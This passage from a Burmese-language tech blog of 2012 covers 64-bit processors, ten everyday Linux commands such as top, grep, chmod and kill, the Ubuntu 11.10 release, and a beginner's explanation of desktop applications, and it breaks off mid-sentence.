ဒါေၾကာင့္မုိ႕လုိ႔ 32 bit processor မ်ား အတြက္ေရးထားတဲ့ WINDOW XP , 2003 အစရွိတဲ့ 32 bit operating system ေတြအသုံးျပဳလုိ႔မရဘဲ သူ႕႕ အတြက္ သီးျခား ထုတ္လုပ္္္ထားတဲ့ windows itanium 64 bit version ကုိ အသုံးျပဳရပါတယ္.။ဒုတိယတစ္မ်ိဳးကေတာ့ intel မွ EM64T နဲ႕ AMD ရ႕ဲ႕ opteron & atholon 64 တုိ႔ပါ။ အဲဒီprocessor ေတြကဘာထူးျခားလဲဆုိေတာ့အေပၚက IA64 Processor ေတြလ ုိ x64instruction set သာမက x86 32 bit instruction set ထည့္သြင္းထားတဲ့ အတြက္ 32 bit ေရာ 64 bit operating system ပါအဆင္ေျပေအာင္ထုတ္လုပ္ထား ပါ တယ္။

Microsoft က၎ processor နဲ႕ ကုိက္ညီတဲ့ x86-64 OS ေတြကုိ ၂၀၀၅ ဧၿပီ လ ထဲက ျဖန္႕ ခ်ီ ခဲ့ ပါတယ္…အဲဒီ x86-64 OS ေတြကုိ အေပၚက EM64T , opteron & atholon 64 တုိ႕ နဲ႕ တဲြၿပီး အသုံးျပဳမယ္ဆုိရင္ 3Dgame ,animationေတြနဲ႕ အျခား 64bit applic ation ေတြမွာပုိမုိျမန္ ဆန္ေအာင္ လုပ္ေဆာင္ႏုိင္ၾက မွာျဖစ္တဲ့ အတြက္ ေနာက္ပုိင္းမွာ 64 bit ကုိတြင္က်ယ္စြာ အသုံးျပဳလာၾက ေတာ့မွာပါ။

Thursday, July 26, 2012

ေန႔တိုင္းနီးပါး သံုးရမယ့္ Linux command ၁၀ ခု


လူတိုင္းနီးပါ၊ Linux သံုးတဲ့သူမွမဟုတ္ပါဘူး၊ ဘယ္ OS ကုိ သံုးတဲ့သူျဖစ္ျဖစ္ command မရိုက္ခ်င္ၾကပါဘူး။ ဒါေပမဲ႔ Linux မွာ Command ကုိ သံုးတာ အလုပ္ကုိတြင္က်ယ္ေစပါတယ္။ ေရြးခ်ယ္စရာေတြမ်ားတယ္။ စိတ္ခ်ရတယ္။

/usr/bin ထဲမွာ command ေပါင္း ၂၁၉၉ နီးပါး ရွိပါတယ္။ /usr/sbin ထဲမွာေတာ့ ၃၈၈ ေလာက္ ရွိပါတယ္ လို႔ (Mandriva Spring 2008) တုန္းက မွတ္ခ်က္ျပဳထားပါတယ္။ အဲဒီ Command ေတြ အကုန္လံုးကုိ မသိေတာင္ အနည္းဆံုး ၁၀ ခုေလာက္ေတာ့ Linux ကုိ ေန႔စဥ္ အသံုးျပဳေနတဲ့ သူေတြ သိသင့္ပါတယ္။

ကြ်န္ေတာ္တို႔ အၿမဲတမ္းအသံုးျပဳေနတဲ့ command ေတြရွိပါတယ္။ (cd,ls,rm,etc… (etc က ေတာ့ command မဟုတ္ဘူးေနာ္)) အဲေလာက္တင္လားဆိုေတာ့ မဟုတ္ေသးပါဘူး။ အရမ္း အသံုး၀င္တဲ့ command ေတြ ရွိပါေသးတယ္။ ဘယ္ linux မွာ ျဖစ္ျဖစ္ အသံုးျပဳလို႔ရပါတယ္။ ၾကည့္ၾကည့္ပါအံုး။

၁၊ top

“top” ကေတာ့ အခုလက္ရွိဘာေတြ လုပ္ေနလည္း၊ ဘယ္ ပရုိဂရမ္ေတြ ဖြင့္ထားလည္း၊ ဘယ္ဟာက RAM ဘယ္ေလာက္သံုးေနလည္း၊ စက္ရဲ႕ RAM က ဘယ္ေလာက္ရွိလည္းဆိုတာေတြအကုန္ ျပေနပါလိမ့္မယ္။ တစ္ခုခု အသစ္ ဖြင့္လိုက္တိုင္းလည္း အဲဒီ list ထဲမွာ ျပေနမွာပဲ ျဖစ္ပါတယ္။

“top” က သင့္ကုိ အခ်ိန္နဲ႔ တစ္ေျပးညီ သင့္စက္ ဘာေတြ လုပ္ေနလည္း ဆိုတာကုိ ျပေပးမွာျဖစ္ပါတယ္။ (#top) ကိုရိုက္လိုက္ရင္ အခု လက္ရွိ ကြန္ျပဴတာက လုပ္ေနတဲ့ အလုပ္ေတြ အကုန္လံုးျပပါလိမ့္မယ္။ root က ဘာေတြ လုပ္ေနလည္း၊ User က ဘာေတြလုပ္ေနလည္း စသည္ျဖင့္။ ဘယ္ user က ဘယ္ ပရုိဂရမ္ကုိ အသံုးျပဳေနလညး္ ဆိုတာကိုလည္း (#top -u username) အားျဖင့္ User တစ္ေယာက္ခ်င္းစီ လုပ္ေဆာင္ခ်က္ေတြကုိလည္း ၾကည့္ႏိုင္ပါတယ္။

GUI မွာေတာ့ System Monitor လို႔ေခၚပါတယ္။ Windows မွာေတာ့ Task Manager ပါ။ GUI မွာေတာ့ အျမဲတမ္း အေရွ႕ဆံုးမွာ focus ျဖစ္ေနပါတယ္။ command မွာေတာ့ minimize လုပ္ထားႏိုင္ပါတယ္။

၂၊ ln

bookmark လုပ္တာပါ။ Network ထဲက Folder ကုိ ျဖစ္ျဖစ္၊ Server က folder တစ္ခုတည္းကုိ User အမ်ားၾကီးက သံုးခ်င္တယ္ဆိုရင္ပဲ ျဖစ္ျဖစ္ ခ်ိတ္ေပးထားႏိုင္ပါတယ္။ Network ထဲမွာဆိုရင္ လံုၿခံဳေရးပိုင္း အေနနဲ႔လည္း ကာကြယ္ျပီးသားျဖစ္ေနပါလိမ့္မယ္။ (ဥပမာ Group တစ္ခုလုပ္ထားျပီး အဲဒီ Group ထဲက user ေတြကုိပဲ အဲဒီ Folder ကို read/write ေပးလုပ္မယ္ဆိုသလိုမ်ိဳးေပါ့) GUI (nautilus) မွာ ေတာ့ Bookmark ဆိုတာပါပါတယ္။ Windows မွာဆိုရင္ Desktop shortcut လုပ္သလိုမ်ိဳးပါ။

၃၊ tar/zip/gzip/unrar/unzip

ဖိုင္ေတြကုိ ၿခံဳ႕လို႔ရမယ္။ ၿခံဳ႕ထားတဲ့ ဖုိင္ေတြကုိ ျဖည္မယ္။ Argument ေတြ ေျပာင္းလိုက္ယံုနဲ႔ အလြယ္တကူ ကိုယ္လုပ္ေစခ်င္တာ လုပ္သြားတဲ့ အတြက္ အလုပ္ကုိ လြယ္ကူျမန္ဆန္ေစပါတယ္။ GUI နဲ႔ဆိုရင္ေတာ့ Right click > Extract here ေပါ့။

၄၊ nano,vi,emacs

command line text editor ပါ။ nano လား၊ vi လား၊ emacs လား၊ အဲဒီစစ္ထဲေတာ့ ကြ်န္ေတာ္မပါခ်င္ပါဘူး။ ႀကိဳက္တာသံုးပါ။ ကြ်န္ေတာ္ကေတာ့ nano သံုးပါတယ္။ ေတာ္ေတာ္မ်ားမ်ားကေတာ့ ေျပာပါတယ္။ nano က အသံုးသိပ္မတည့္ဘူးေပါ့။ လုပ္လို႔ရတယ့္ function နည္းတယ္လို႔ ေျပာၾကပါတယ္။ အဲဒါကပဲ ကြ်န္ေတာ့္အတြက္ေတာ့ အလြန္ရိုးရွင္းေနတာပါ။ Linux စက္တစ္လံုးကုိ Administration လုပ္မယ္ဆိုရင္ေတာ့ command line text editor တစ္ခုခုကုိ မျဖစ္မေန ကိုင္တြယ္ အသံုးျပဳတတ္ေနရပါမယ္။ GUI မွာေတာ့ Gvim ဒါမွမဟုတ္ gedit ရွိပါတယ္။

၅၊ grep

ဒီ command ကေတာ့ လူႀကိဳက္ေတာ္ေတာ္မ်ားပါတယ္။ ဖိုင္တစ္ဖိုင္ကုိ လိုခ်င္သလို ပိုင္းပိုင္း ဖတ္လို႔ရတာပါပဲ။ ဥပမာ httpd.conf ဖိုင္ကုိ ဖတ္မယ္ ဆိုပါဆို႔။ အဲဒီဖိုင္က စာေၾကာင္းေရ ၁၀၀၀ ေက်ာ္ရွိတယ္။ အဲဒီဖိုင္ထဲမွာ ဘယ္ေနရမွာ “AccessFileName .htaccess” ဆိုတာရွိသလည္းသိခ်င္တယ္။

စာေၾကာင္း ၁၅၃ မွာ ရွိပါတယ္ဆိုပါဆို။ ရိုးရိုး ဖတ္မယ္ဆိုရင္ ၁၅၃ ကုိေရာက္ေအာင္ down arrow ကုိ ဖိထားရပါတယ္။ ဖိထားယံုနဲ႔ေတာ့မရပါဘူး၊ လိုက္ဖတ္ေနရအံုးပါမယ္။ grep သံုးၾကည့္ရေအာင္။ grep -n “AccessFileName .htaccess” /etc/apache2/apache2.conf ဒါဆို terminal မွာ “153:AccessFileName .htaccess” ဆိုျပီး တန္းျပပါလိ့မ္မယ္။ လြယ္ဘူးလားဗ်ာ။

GUI မွာ gedit နဲ႔ဖြင့္ျပီး Search လုပ္လို႔ရပါတယ္။

“grep” က တစ္ျခား command ေတြနဲ႔လည္း piping (|) နဲ႔ခံျပီး တြဲသံုးလို႔ရပါေသးတယ္။ ဥပမာ တစ္ခုအေနနဲ႔ “ps”(လက္ရွိဘာေတြ run ေနလည္းဆိုတာၾကည့္တာပါ) နဲ႔တြဲသံုးၾကည့္ရေအာင္။ firefox က အလုပ္ေကာင္းေကာင္းမလုပ္ပဲ hang ေနတယ္ ဆိုပါေတာ့။ firefox ရဲ႕ PID ကုိ ၾကည့္ျပီးေတာ့ firefox ကုိ ပိတ္ပစ္ခ်င္တယ္။ “ps aux” ရိုက္လိုက္ရင္ Run ထားတာေတြ အကုန္ထြက္လာပါလိမ့္မယ္။ အမ်ားၾကီးထဲကမွ firefox ကိုလိုက္ရွာေနမလား ၾကာပါတယ္။ “ps aux|grep firefox” လို႔ေျပာင္းရိုက္လိုက္ပါ။ firefox’s process တစ္ခုတည္း ျမင္ရပါလိမ့္မယ္။

GUI မွာ System monitor ကေန ၾကည့္လို႔ရပါတယ္။

၆၊ chmod

File/folder ေတြကုိ permissions ေျပာင္းတာပါ။ Web tool ေတာ္ေတာ္မ်ားမ်ားမွာ တိက်တဲ့ permissions လုိပါတယ္။ chmod ကုိ မသံုးခင္ w=write,r=read,နဲ႔ x=execute ကုိ အမွတ္ရေနပါ။ ဘယ္ဖိုင္က ဘယ္ permissions ေတြလိုလည္း ေသေသခ်ာခ်ာၾကည့္ပါ။ rw- rw- rw- ဆိုရင္ေတာ့ User, Group and Other User အကုန္လံုး read/write permissions ရေနပါလိမ့္မယ္။ အဆင္မေျပပါ။ Other user အတြက္ အကန္႔အသတ္နဲ႔သာျဖစ္သင့္ပါတယ္။ read only ဒါမွမဟုတ္ execute only. GUI (nautilus) မွာ ေတာ့ right click > properties > Permissions

၇၊ dmesg

old-school လုိ႔ ကြ်န္ေတာ့္ကုိ ေခၚခ်င္ေခၚပါ။ ဒါေပမယ့္ device တစ္ခု Linux စက္မွာ တပ္လိုက္တာနဲ႔ dmesg ကုိ အရင္ဆံုးရိုက္ပါတယ္။ သူက kernel buffer ေတြအားလံုးကုိ ျပပါတယ္။ အေရးၾကီးပါတယ္။ သိသင့္သိထိုက္ တဲ့ information ေတြ ျဖစ္တဲ့ system architecture, gpu, network device, kernel boot options used, RAM totals စသည္ျဖင့္ပါ။

နည္းနည္း trick ေလးလုပ္ၾကည့္ခ်င္လား။ tail ခံျပီး ရိုက္ၾကည့္ရေအာင္။ (dmesg | tail -f) ဒါဆိုရင္ ေနာက္ ဆံုး ေလးငါးေၾကာင္း ျပပါလိမ့္မယ္။ ဒါေပမယ့္ တစ္ခုခု ထူးျခားတိုင္း (စက္ကုိ အလုပ္ေတြမ်ားႀကီး ခိုင္းထားတဲ့အခ်ိန္ ဒါမွမဟုတ္ debugging လုပ္ေနတုန္းအခ်ိန္) အဲဒီ ေလးငါးေၾကာင္းမွာပဲ အသစ္ အသစ္ေတြကုိ ျမင္ေနရပါလိမ့္မယ္။

၈၊ kill/killall

အခုဆိုရင္ Linux kernel က ေတာ္ေတာ့္ကုိ stability ျဖစ္ေနပါျပီ။ kernel န႔ဲ မသက္ဆိုင္တဲ့ တစ္ခ်ိဳ႕ ေဆာ့၀ဲ ေတြက တစ္ခါတစ္ေလ ေၾကာင္တတ္ပါတယ္။ အဲဒီအတြက္ သူ႔ကုိ ဖ်က္ထုတ္ပစ္ဖုိ႔(အဲဒီ ေဆာ့၀ဲကုိ restart ျပန္လုပ္ပစ္ဖို႔ ရပ္ပစ္ျပီး ျပန္စဖို႔) လိုပါတယ္။ အဲဒီအတြက္ အျမန္ဆံုးနည္းလမ္းကေတာ့ “kill” ဒါမွမဟုတ္ “killall” နဲ႔ လုပ္ပစ္တာပါပဲ။ “kill” နဲ႔ “killall” ကြာတာကေတာ့ kill က PID(process ID number) လိုျပီး၊ killer ကေတာ့ ေဆာ့ဝဲ နာမည္လိုပါတယ္။

တစ္ခုလုပ္ၾကည့္ရေအာင္။ ဥပမာ၊ firefox က hang ျဖစ္ေနတယ္ ဆိုပါေတာ့။ firefox ကုိ ရပ္ပစ္ဖို႔အတြက္ kill ကုိ အသံုးျပဳပါမယ္။ kill ကုိ အသံုးျပဳမယ္ဆိုရင္ PID လုိမယ္။ ဘယ္လိုရမလညး္ ဆိုေတာ့ ps aux|grep firefox နဲ႔ ၾကည့္ရပါမယ္။ PID ကို ps နဲ႔မၾကည့္ခ်င္ဘူးဆိုရင္လညး္ killall firefox ဆိုျပီး တန္းရိုက္လို႔ရပါတယ္။ ဒါေပမယ့္ killall က daemons process (Apache,Samba,etc) ေတြကို အလုပ္လုပ္ခ်င္မွလုပ္ပါမယ္။ GUI မွာေတာ့ System monitor ကေန kill process လုပ္လုိ႔ရပါတယ္။

၉၊ man

RTFM “Read the Fine Manual” အဲဒီစကားလံုးကုိ ဘယ္ေလာက္မ်ားမ်ား သင္ေတြ႔ဘူးပါသလဲ။ ကြ်န္ေတာ့္အတြက္ေတာ့ Linux မွာ Manual ဖတ္ေနတာထက္ manpages ကုိ ဖတ္လိုက္တာ ပိုအလုပ္ျဖစ္မယ္လို႔ ထင္ပါတယ္။ “Read the fine Manpages” ေပါ့။ Manpage ေတြက ပံုစံတစ္ခုတည္းန႔ဲ ေရးထားတာပါ။ တစ္ခုကုိ နားလည္ေအာင္ ဖတ္ၾကည့္ျပီးသြားျပီဆိုရင္ ေနာက္ ဘယ္ဟာကုိ ဖတ္ဖတ္ နားလည္လြယ္လာပါလိမ့္မယ္။ command တိုင္းရဲ argument ေတြကလည္း ဆက္စပ္မႈေတြ ရွိေနပါတယ္။

အေပၚဆံုး နွစ္ေၾကာင္းသံုးေၾကာင္းဖတ္လို႔နားမလညး္လည္း ကိစၥမရွိပါဘူး။ ဆက္ၾကည့္သြားပါ၊ detail ကုိ ရွင္းျပထားတာေတြ လညး္ ပါပါတယ္။ Linux command ေတြကို အလုပ္လုပ္ဖို႔အတြက္ အကုန္လံုး အလြတ္က်က္ေနစရာ မလုိပါဘူး။ ဘယ္နားရွိမယ္ဆိုတာပဲ သိယံုနဲ႔ အလုပ္ျဖစ္ပါတယ္။ ဒါေၾကာင့္မို႔ manpages ေတြကုိ ဖတ္တတ္ေအာင္ ၾကိဳးစားပါ။

၁၀၊ mount/umount

removable media ေတြ တပ္မယ္၊ ျဖဳတ္မယ္ဆိုရင္ သံုးပါတယ္။ boot တက္တာနဲ႔ တပ္ဆင္ထားတာေတြကုိေတာ့ /etc/fstab ဖိုင္မွာ ေရးထားပါတယ္။ mount/unmount ကေတာ့ root privileges(super user) လုိပါတယ္။ mount command ကုိ ဘာ arugument မွမထည့္ပဲလည္း ရိုက္ၾကည့္ႏိုင္ပါတယ္။ စက္မွာ ဘယ္ devices ေတြတပ္ထားလည္း ျပလာမွာျဖစ္ပါတယ္။

အထက္ပါ ၁၀ ခုကေတာ့ Linux administration အတြက္ မရွိမျဖစ္လိုတာေတြပါ။ အဲဒါေလးေလာက္ပဲ သိထားတာကိုပဲ ေတာ္ေတာ္ အကူအညီရေနပါျပီ။ အလုပ္လုပ္ရာမွာ လြယ္လြယ္ကူကူ ျမန္ျမန္ဆန္ဆန္ ျဖစ္ေစပါတယ္။ ဒီ ၁၀ ခုတင္လားဆိုေတာ့လည္း မဟုတ္ေသးပါဘူး။ တစ္ေယာက္နဲ႔ တစ္ေယာက္ လုိအပ္ခ်က္ခ်င္းမတူသလိုေပါ့။ liux server ကုိင္ေနတာလား၊ ဒါမွမဟုတ္ Linux နဲ႔ web developement လုပ္ေနတာလား၊ တစ္ကိုယ္ရည္ သံုးပဲလားဆိုတာမွာလည္း ကြဲျပားမႈေတြ ရွိေနပါတယ္။ ဒါေပမယ့္ ကြ်န္ေတာ္ ေန႔တိုင္း အဲဒီ ၁၀ ခုထဲက တစ္၀က္ ေက်ာ္ေက်ာ္ ကုိ အျမဲတမ္း အသံုးျပဳရပါတယ္။

Source: ေမာကၡ

Wednesday, July 25, 2012

ေနာက္ဆံုး အသစ္ထြက္လာေသာ Ubuntu 11.10 အေၾကာင္း တေစ႔တေစာင္း

တစ္ကမၻာလံုးေစာင့္ေမွ်ာ္ေနၾကတဲ့ ubuntu 11.10 Oneiric Ocelot ကေတာ့ လြန္ခဲ့တဲ့ ေအာက္တိုဘာ ၁၃ ရက္ေနက ထြက္လာပါျပီ။

11.10 ကေတာ့ အရင္ရွိျပီးသား အေဟာင္းမ်ားနဲ႔ အသစ္အသစ္ ထပ္ထုတ္ထားတဲ့ Open-source နည္းပညာေတြ ေပါင္းစပ္ျပီး အရည္အေသြးျမင့္ျမင့္ နဲ႔ အသံုးျပဳရ အလြန္လြယ္ကူေအာင္ လုပ္ေဆာင္ထားပါတယ္လို႔လည္း အဲဒီထုတ္ကုန္ အဖြဲ႔က သူတို႔ website ရဲ႔ Unbutu 11.10 ေၾကာ္ျငာမွာ ထည့္သြင္းေရးသားထားပါတယ္။

Unbutu 11.10 က ဘာသာစကား ၃၈ မ်ိဳးနဲ႔ အသံုးျပဳလို႔ရမွာ ျဖစ္ျပီး Canonical က ထုတ္လုပ္တဲ့ အခမဲ့ Llinux Operation System ျဖစ္ပါတယ္။ အခုဆိုရင္ သူ႔ရဲ႔ website မွာ Download လုပ္ႏုိင္ပါတယ္။ သူ႔ အရင္ version ျဖစ္တဲ့ Ubuntu 11.04 အသံုးျပဳသူေတြကေတာ့ Ubuntu ထဲမွာပါရွိတဲ့ Update Manager ကေနတစ္ဆင့္Upgrade လုပ္ေဆာင္ႏိုင္မွာျဖစ္ပါတယ္။ ဘယ္လို Upgrade လုပ္ေဆာင္ရမလည္း ဆိုတာကိုလညး္ website မွာ အဆင့္အဆင့္ အလုပ္လုပ္ပံုေတြကုိ ရွင္းျပထားပါတယ္။

Ubuntu 11.10 က ဘယ္လိုေတြ အလုပ္လုပ္လည္းဆိုတာ ကနဦးအေနနဲ႔ ေလ့လာခ်င္ေသးတယ္ဆိုရင္ေတာ့ Online tour မွာ စမ္းသပ္အသံုးျပဳၾကည့္ႏိုင္မွာျဖစ္ျပီး slide-show အေနနဲ႔လည္း အြန္လိုင္းမွ ၾကည့္ရႈနိုင္မွာ ျဖစ္ပါတယ္။

Ubuntu 11.10 အတြက္ ပံုမွန္ update ကိုေတာ့ ဧပရယ္ ၂၀၁၃ အထိ ေနာက္ ၁၈ လ အထိေပးထားမွာျဖစ္ျပီး Long Term Support(LTS) ကာလရွည္ (၅ နွစ္) အတြက္ကေတာ့ ေနာက္ႏွစ္ ဧပရယ္လမွာ အသစ္ထြက္မယ့္ Ubuntu 12.04 Precise Pangolin မွာ ရမွာျဖစ္ပါတယ္။

A Smoother Unity

အရင္ version 11.04 မွာပါတဲ့ မိုဘိုင္းစတိုင္ Unity Interface ကို ပဲ အနည္းအက်ဥ္းျပဳျပင္ျပီး ပံုေသအေနနဲ႔ ထားေပးထားပါတယ္။ ဒါေပမယ့္လည္း Gnome က အသစ္ထုတ္ထားတဲ့ Gnome3 (Gnome-shell) ကိုလည္း သြင္းျပီး အသံုးျပဳနိင္မွာ ျဖစ္ပါတယ္။

အသံုးျပဳသူမ်ားရဲ႕ စမ္းသပ္ေလ႔လာခ်က္မ်ားအရေတာ့ Ubuntu 11.10 မွာ Unity Interface ကုိပဲ ပိုမိုေကာင္းမြန္နဲ႔ အသံုးျပဳရလြယ္ကူေအာင္ လုပ္ထားတာပဲ ဦးတည္ေနပါတယ္လို႔ဆိုၾကပါတယ္။

Open for Business

ကိုယ္အသံုးျပဳခ်င္တဲ့ အသံုးတည့္မယ့္ ေဆာ့၀ဲလ္ ေတြကုိ ရွာေဖြ တင္သြင္းဖို႔ကေတာ့ Ubuntu Software Center က အခုဆိုရင္ ပိုမိုလြယ္ကူေအာင္ ရွာေဖြရ ျမန္ဆန္ေအာင္ လုပ္ေပးထားပါတယ္။ အုပ္စုအလိုက္ ရွာေဖြ၍ ရသလို ေဆာ့၀ဲလ္ နာမည္နဲ႔လည္း ရွာေဖြရတာ လြယ္ကူေစပါတယ္။ ေဆာ့၀ဲ ေတာ္ေတာ္မ်ားမ်ားကိုလည္း မ်က္စိပဌာသ ျဖစ္ေအာင္ အသံုးျပဳခ်င္စိတ္ေပါက္ေအာင္ အလွဆင္ေပးထားပါေသးတယ္ လို႔ Project team က ညႊန္းထားပါေသးတယ္ ခင္ဗ်။

ကြ်န္ေတာ္ကေတာ့ Thunderbird နဲ႔ အသစ္တစ္ခုျဖစ္တဲ့ Deja Dup Backup tool ပါလာတာကုိ အၾကိဳက္ဆံုးပါပဲ။ Thunderbird က Evolution ထက္ လူၾကိဳက္ပိုမ်ားျပီး သံုးလို႔ပိုေကာင္းတယ္ထင္လို႔ပါ။ Deja Dup Backup ကေတာ့ ကလိရင္း ခနခန Data ေတြ ပ်က္ပ်က္ကုန္တာကုိ ေကာင္းေကာင္း အကူအညီေပးမယ့္ေဆာ့၀ဲလ္ ပဲေလ။

Ubuntu 11.10 က Open for business အတြက္အေသအခ်ာပါပဲ။ Desktops, Servers and Clouds အတြက္ ေရြးခ်ယ္စရာ အခမဲ့ ေဆာ့၀ဲလ္ အမ်ားအျပားနဲ႔ တစ္ျခား လိုခ်င္ေသးတယ္ဆိုရင္ full-service support and consulting ေတြကိုပါရႏိုင္ပါေသးတယ္လို႔လည္း Canonical က ေျပာပါတယ္။

20 Million Strong

ေငြကုန္ေၾကးက် သက္သာစြာနဲ႔ အခမဲ့ ေဆာ့၀ဲမ်ားကုိ Micorsoft WIndows မဟုတ္ပဲ တစ္ျခား Operation system တစ္ခုခု ကုိ Windows လိုပဲ End user အေနနဲ႔ အသံုးျပဳခ်င္တယ္ဆိုရင္ျဖင့္ သင္တို႔ေဘးနားေလးမွာ တစ္ကမၻာလံုး အတိုင္းအတာနဲ႔ဆိုရင္ 20 millon ေလာက္အသံုးျပဳေနၾကတဲ့ Ubuntu ကရွိေနမွာပါလို႔လညး္ Canonical ကထပ္ေျပာပါေသးတယ္ခင္ဗ်။

Source: ေမာကၡ

Tuesday, July 24, 2012

Application မ်ားအေၾကာင္း နားလည္သေဘာေပါက္ေစရန္

Application ဆိုတာဘာလဲ?


စာဖတ္သူဟာ Application အသံုးျပဳျခင္း (သို႔) App အသံုးျပဳျခင္းဆိုတာနဲ႔ပတ္သက္ၿပီး လူေတြေျပာေနၾကတာကို ၾကားဖူးေကာင္းၾကားဖူးပါလိမ့္မယ္။ တကယ္တမ္းမွာေတာ့ Application ေခၚ App ဆိုတာဟာ တိက်ေသခ်ာတဲ့လုပ္ေဆာငင္ခ်က္မ်ားကိုျပဳလုပ္ေစႏုိင္မယ့္ Software အမ်ိဳးအစားတစ္ခုျဖစ္ပါတယ္။ Desktop နဲ႔ Laptop ကြန္ပ်ဴတာေတြအတြက္ Application မ်ားကို Desktop Application မ်ားဟုေခၚဆိုႏုိင္ၿပီး မိုဘုိင္းထုတ္ကုန္ေတြနဲ႔ပတ္သက္တဲ့ Application မ်ားကိုေတာ့ Mobile Apps ဟုေခၚဆိုႏုိင္ပါတယ္။ Application တစ္ခုကိုဖြင့္လိုက္တဲ့အခါမွာ ၄င္းဟာ OS အတြင္းမပိတ္မခ်င္းလုပ္ေဆာင္ပါတယ္။ တစ္ခ်ိန္တည္း တစ္ၿပိဳင္နက္အတြင္းမွာ Application တစ္ခုထက္ပိုၿပီးအသံုးျပဳျခင္းကိုေတာ့ Multitasking လို႔ေခၚပါတယ္။

App ဆိုတာကေတာ့ Application ကိုဗန္းစကားအေနနဲ႔အသံုးျပဳထားတာျဖစ္ပါတယ္။ အထူသျဖင့္ ရုိးရွင္းတဲ့ Application ေတြကိုေစ်းႏႈန္းသက္သာစြာနဲ႔ Download ျပဳလုပ္ႏုိင္သလို အခမဲ့အေနျဖင့္လည္း ရရွိႏုိင္ပါတယ္။ App အမ်ားစုကိုမိုဘုိင္းထုတ္ကုန္မ်ားနဲ႔ TV မ်ားအတြက္ပါေထာက္ပံ့ေပးထားပါတယ္။
မေရမတြက္ႏုိင္ေလာက္ေအာင္မ်ားျပားတဲ့ Desktop Application ေတြကိုကြဲျပားျခားနားတဲ့အမ်ိဳးအစားျဖင့္ ေတြ႔ရွိႏုိင္ပါတယ္။ တခ်ိဳ႔ Application ေတြဟာ Microsoft Word လိုမ်ိဳးအျပည့္အ၀အသံုးခ်ႏုိင္ၿပီး တခ်ိဳ႔ကိုေတာ့ Gedget ေတြလိုမ်ိဳးျဖင့္သာ အသံုးျပဳႏုိင္ပါတယ္။ အသံုးျပဳသင့္တဲ့ Desktop Application မ်ားျဖစ္ပါတယ္။

Word Processors : Word Processor ကေတာ့ စာတစ္ေစာင္ေရးသားျခင္း၊ လက္ကမ္းေၾကာ္ျငာတစ္ေစာင္ျပဳလုပ္ျခင္းနဲ႔ အျခား Document မ်ားဖန္တီးျခင္းတို႔ကိုျပဳလုပ္ႏုိင္ေစပါတယ္။ ထင္ရွားတဲ့ Word Processor ကေတာ့ Microsoft Word ပါ။
Personal Finance : Quicken လိုမ်ိဳး Personal Finance ေဆာ့ဖ္၀ဲကေတာ့ အသံုးျပဳသူရဲ့၀င္ေငြနဲ ထြက္ေငြမ်ားကိုေျခရာခံျခင္း၊ ၀င္ေငြထက္ေငြစာရင္း ဖန္တီးျခင္းစတာေတြကို ျပဳလုပ္ႏုိင္ပါတယ္။ Personal Finance ပရိုဂရမ္အမ်ားစုဟာ ဘဏ္ကအခ်က္အလက္ေတြကိုအလိုအေလ်ာက္ Download ျပဳလုပ္ေပးႏုိင္တဲ့အတြက္ အေရာင္းအ၀ယ္ကိစၥရပ္အားလံုးကို အခ်ိန္ကုန္စရာမလိုဘဲျပဳလုပ္ႏုိင္မွာျဖစ္ပါတယ္။

Web Browser : Web Browser ဆိုတာကေတာ့ World Wide Web ကိုအသံုးျပဳႏုိင္ေစမယ့္ Tool တစ္ခုပါ။ ကြန္ပ်ဴတာအမ်ားစုမွႀကိဳတင္ထည့္သြင္းေပးထားတဲ့ Web Browser တစ္ခုပါ၀င္ေလ့ရွိေပမယ့္ သံုးစြဲသူအေနနဲ႔ ကြဲျပားတဲ့အျခား Browser တစ္ခုကို Download ျပဳလုပ္ၿပီးသံုးႏုိင္ပါတယ္။ အသံုးမ်ားတဲ့ Browser မ်ားကေတာ့ Internet Explorer, Firefox, Google Chrome နဲ႔ Safari တို႔ျဖစ္ပါတယ္။
Games : ကြန္ပ်ဴတာေပၚမွာကစားႏုိင္တဲ့ ဂိမ္းဟာ Solitaire လိုဖဲခ်ပ္ဂိမ္းေတြကေန Halo 2 လိုအက္ရွင္ဂိမ္းေတြအထိေျမာက္ျမားစြာရွိပါတယ္။ တခ်ိဳ႔အက္ရွင္ဂိမ္းေတြက တြက္ခ်က္မႈစြမ္းအင္မ်ားစြာလိုအပ္တဲ့အတြက္ အသံုးျပဳသူထံမွ ေခတ္မီတဲ့ကြန္ပ်ဴတာအသစ္တစ္လံုးမရွိမျခင္း ၄င္းဂိမ္းေတြကို ကစားႏုိင္မွာမဟုတ္ပါဘူး။

Media Player : တကယ္လို႔ အသံုးျပဳသူဟာ Mp3 နားေထာင္ျခင္းနဲ႔ Download ျပဳလုပ္ထားတဲ့ရုပ္ရွင္ၾကည့္ရႈ႔ျခင္းစတာေတြကိုျပဳလုပ္လိုတဲ့အခါမွာ Media Player တစ္ခုရွိရန္လိုအပ္ပါတယ္။ နာမည္ေက်ာ္ Media Player ေတြကေတာ့ Window Media Player နဲ႔ iTunes တို႔ျဖစ္ပါတယ္။

Gedgets : Gedget ေတြကိုတစ္ခါတစ္ရံမွာ Widget လို႔လည္းေခၚဆိုႏုိင္ပါတယ္။ ၄င္းက ရိုးရွင္းတဲ့ Application ေတြျဖစ္ၿပီး Desktop (Mac တြင္ Dashboard) ေပၚမွာတင္ကာအသံုးျပဳႏုိင္ပါတယ္။ ကြဲျပားျခားနားတဲ့ Gedget အမ်ိဳးအစားေျမာက္ျမားစြာရွိၿပီး အဲ့ဒိအထဲမွာ ျပကၡဒိန္မ်ား၊ ဂဏန္းတြက္ခ်က္စက္မ်ား၊ ေျမပံုမ်ားနဲ႔ သတင္းေခါင္းစဥ္မ်ား စတာေတြပါ၀င္ပါတယ္။

Desktop Application မ်ားကိုထည့္သြင္းျခင္း
Application တစ္ခုကို အသံုးျပဳလိုတဲ့အခါမွာ အဲ့ဒိ Application ကိုကြန္ပ်ဴတာမွာထည့္သြင္းဖို႔ လိုပါတယ္။ ေယဘုယ်အားျဖင့္ Installation ျပဳလုပ္တဲ့အခါမွာ ရိုးရွင္းပါတယ္။ Installation Disc တစ္ခ်ပ္ကိုထည့္သြင္းၿပီး Screen ေပၚမွာ ေပၚလာတဲ့ညႊန္ၾကားခ်က္အတုိင္းလိုက္လံျပဳလုပ္ရံုပါပဲ။ အင္တာနက္ေပၚမွာ Download ျပဳလုပ္ထားတဲ့ Software ေတြကို Install လုပ္ခ်င္တယ္ဆိုရင္ေတာ့ အဲ့ဒိ Software ကို Download လုပ္ၿပီးတာနဲ႔ Double Click ႏွိပ္ကာ Screen ေပၚမွာ ေပၚလာတဲ့လမ္းညြန္ခ်က္အတုိင္း ျပဳလုပ္ျခင္းျဖင့္ 